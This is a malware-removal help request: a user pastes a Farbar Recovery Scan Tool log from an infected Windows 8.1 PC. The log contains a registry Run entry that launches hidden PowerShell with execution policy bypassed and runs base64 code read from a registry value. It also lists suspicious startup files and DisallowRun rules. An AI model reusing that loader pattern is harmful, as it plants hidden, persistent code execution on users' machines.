My computer is infected by malware and viruses that have led to the closure of my Upwork online account by the administrator. Upwork is an online freelancing platform where clients hire writers for their projects.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-05-2017 01
Ran by DENNIS M (administrator) on NON (05-05-2017 12:44:08)
Running from C:\Users\USER\Desktop
Loaded Profiles: DENNIS M (Available Profiles: DENNIS M)
Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe
(Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\stacsv64.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Smadsoft) C:\Program Files (x86)\SMADAV\SMΔRTP.exe
(IDT, Inc.) C:\Program Files\SigmaTel\C-Major Audio\WDM\sttray64.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\WebcamMax\wcmmon.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\Upwork\upwork.exe
(Creative Technology Ltd.) C:\Windows\OEM02Mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect32.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect64.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-05] (AVAST Software)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SMΔRT-Protection] => C:\Program Files (x86)\Smadav\SMΔRTP.exe [1736704 2017-01-14] (Smadsoft)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Upwork] => C:\Program Files (x86)\Upwork\upwork.exe [2227496 2017-03-22] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [WebcamMaxAutoRun] => C:\Program Files (x86)\WebcamMax\wcmmon.exe [1038848 2011-07-17] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27545048 2017-03-14] (Skype Technologies S.A.)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [{245CAE4C-B7DC-4752-B92F-63DC8D25D4FD}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\wKNjXxBOSrsVKip').XFXEEJHACAA)));
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: F - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {3095b6bd-de5e-11e6-826c-001e101ff262} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767a9-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767d2-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a876c3c-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a87767e-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {87768129-1e8e-11e7-82b0-001e101f9824} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488244-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488259-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488288-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {b12ce2cb-f2e7-11e6-828b-ac9469c63d41} - "F:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de97fe40-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de980e8d-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c454ea-e7bf-11e6-8278-001e101f5f92} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c45c74-e7bf-11e6-8278-001e101f5f92} - "I:\Windows/AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f883703f-b67f-11e6-824f-d86e29ba0045} - "F:\LGAutoRun.exe"
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
Startup: C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs [2017-04-05] ()
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
ProxyServer: [S-1-5-21-1975919165-801266099-53085287-1001] => 172.16.63.3:3128
Tcpip\..\Interfaces\{184075C4-2C8A-47A2-9E62-9B050AC455FE}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{81B6590E-6D8F-436F-A5D6-5C5E2B0D4DAA}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{9BC7269C-8318-4392-AE33-BA4A97141ADE}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{EB8D0396-AB58-4921-9F28-5549F56295E6}: [NameServer] 196.201.217.7 196.201.216.21
Internet Explorer:
==================
HKU\S-1-5-21-1975919165-801266099-53085287-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-05-05] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-05-05] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
FireFox:
========
FF DefaultProfile: 70sdybgu.default
FF ProfilePath: C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default [2017-05-05]
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> share_proxy_settings", true
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> type", 0
FF Extension: (Grammarly for Firefox) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-05-04]
FF Extension: (Simple YouTube to MP3/MP4 Converter and Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-23]
FF Extension: (Youtube Downloader - 4K Download) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (1-Click YouTube Video Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (Youtube Best Video Downloader 2) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{170503FA-3349-4F17-BC86-001888A5C8E2}.xpi [2017-04-10]
FF Extension: (Copy As Plain Text) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{1a5dabbd-0e74-41da-b532-a364bb552cab}.xpi [2017-01-30]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2017-02-18]
FF Extension: (Shield Recipe Client) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\features\{70a68181-2263-4af4-847f-b2a1a5404527}\[email protected] [2017-05-01]
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll [2016-11-27] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
Chrome:
=======
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default [2017-05-04]
CHR Extension: (Google Docs) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-01-11]
CHR Extension: (Google Drive) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-01-11]
CHR Extension: (YouTube) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-11]
CHR Extension: (Google Docs Offline) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-01-11]
CHR Extension: (Grammarly for Chrome) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-04-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-14]
CHR Extension: (Gmail) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-01-11]
CHR Extension: (Chrome Media Router) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-10]
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe [86016 2007-09-20] (Andrea Electronics Corporation)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-05] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-05] (AVAST Software)
R2 FoxitReaderService; C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe [1659592 2016-10-13] (Foxit Software Inc.)
S3 ShareItSvc; C:\Program Files (x86)\SHAREit\SHAREit\Shareit.Service.exe [33224 2016-04-15] (SHAREit Technologies Co.Ltd)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\STacSV64.exe [122880 2008-02-15] (IDT, Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-05] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-05] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-05] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-05] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-05] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-05-05] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-05] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-05] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-05] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-05] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-05] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158368 2017-05-05] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-05] (AVAST Software)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63al.sys [5170176 2013-07-01] (Broadcom Corporation)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 ewusbnet; C:\Windows\system32\DRIVERS\ewusbnet.sys [246224 2009-12-07] (Huawei Technologies Co., Ltd.)
R3 hwusbdev; C:\Windows\system32\DRIVERS\ewusbdev.sys [114304 2009-10-12] (Huawei Technologies Co., Ltd.)
R3 OEM02Dev; C:\Windows\system32\DRIVERS\OEM02Dev.sys [266624 2007-10-10] (Creative Technology Ltd.)
R3 OEM02Vfx; C:\Windows\system32\DRIVERS\OEM02Vfx.sys [12288 2007-03-05] (EyePower Games Pte. Ltd.)
R2 risdptsk; C:\Windows\system32\DRIVERS\risdsn64.sys [76288 2009-09-24] (REDC)
S3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (The OpenVPN Project) [File not signed]
S3 VMSMP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
S3 VMSP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
R2 WCMVCAM; C:\Windows\system32\DRIVERS\wcmvcam64.sys [1071032 2012-04-16] (Windows ® Win 7 DDK provider)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2017-05-05 12:37 - 2017-05-05 12:43 - 00023145 _____ C:\Users\USER\Desktop\Addition.txt
2017-05-05 12:36 - 2017-05-05 12:44 - 00019388 _____ C:\Users\USER\Desktop\FRST.txt
2017-05-05 12:35 - 2017-05-05 12:44 - 00000000 ____D C:\FRST
2017-05-05 12:32 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Desktop\FRST64.exe
2017-05-05 12:30 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Downloads\FRST64.exe
2017-05-05 11:35 - 2017-05-05 11:35 - 00003882 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1493973343
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-05-05 11:34 - 2017-05-05 11:34 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw722D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw7048.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6DD6.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6C10.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6817.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw65F3.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw641D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw612E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw5DC2.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw590E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw54C8.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw51C9.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4F18.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4C78.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4979.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw46F7.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw40FB.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3DBE.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3B3C.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw36A7.tmp
2017-05-05 10:06 - 2017-05-05 10:06 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-05 10:03 - 2017-05-05 10:03 - 00000000 ____D C:\Users\USER\AppData\Roaming\AVAST Software
2017-05-05 09:56 - 2017-05-05 11:12 - 00000000 ____D C:\Program Files\Common Files\AV
2017-05-05 09:55 - 2017-05-05 11:22 - 00004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-05-05 09:55 - 2017-05-05 09:54 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00158368 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-05-05 09:54 - 2017-05-05 09:54 - 00992960 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00921280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00400456 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-05-05 09:42 - 2017-05-05 11:34 - 00000000 ____D C:\Program Files\AVAST Software
2017-05-05 09:40 - 2017-05-05 11:34 - 00000000 ____D C:\ProgramData\AVAST Software
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\USER\Downloads\avast_free_antivirus_setup_online.exe
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\Public\Desktop\avast_free_antivirus_setup_online.exe
2017-05-04 11:34 - 2017-05-04 11:34 - 00000000 ____D C:\Users\USER\Desktop\New folder
2017-05-02 19:32 - 2017-05-02 19:32 - 00013188 ____H C:\Users\USER\Documents\~WRL0251.tmp
2017-04-28 12:01 - 2017-04-28 12:01 - 00002432 _____ C:\Users\USER\Desktop\Grammarly.lnk
2017-04-28 12:01 - 2017-04-28 12:01 - 00000000 ____D C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly
2017-04-28 12:00 - 2017-04-28 12:02 - 00000000 ____D C:\Users\USER\AppData\Local\GrammarlyForWindows
2017-04-28 11:38 - 2017-04-28 11:52 - 48679480 _____ (Grammarly) C:\Users\USER\Downloads\GrammarlySetup.exe
2017-04-25 19:58 - 2017-04-25 19:58 - 00199010 __RSH C:\Users\USER\AppData\Roaming\rundll32.exe
2017-04-24 16:26 - 2017-04-24 16:26 - 00000000 ____D C:\Users\USER\Desktop\certs
2017-04-24 16:05 - 2017-05-03 15:55 - 00000000 __SHD C:\[Smad-Cage]
2017-04-24 16:05 - 2017-04-28 15:16 - 00000000 ____D C:\Program Files (x86)\SMADAV
2017-04-24 16:05 - 2017-04-24 16:05 - 00003162 _____ C:\Windows\System32\Tasks\smadav
2017-04-24 16:05 - 2017-04-24 16:05 - 00001080 _____ C:\Users\Public\Desktop\SMADΔV.lnk
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\Users\USER\AppData\Roaming\Smadav
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SMADAV Antivirus
2017-04-24 16:03 - 2017-04-24 16:03 - 01500777 _____ (Smadsoft ) C:\Users\USER\Downloads\smadav2017.exe
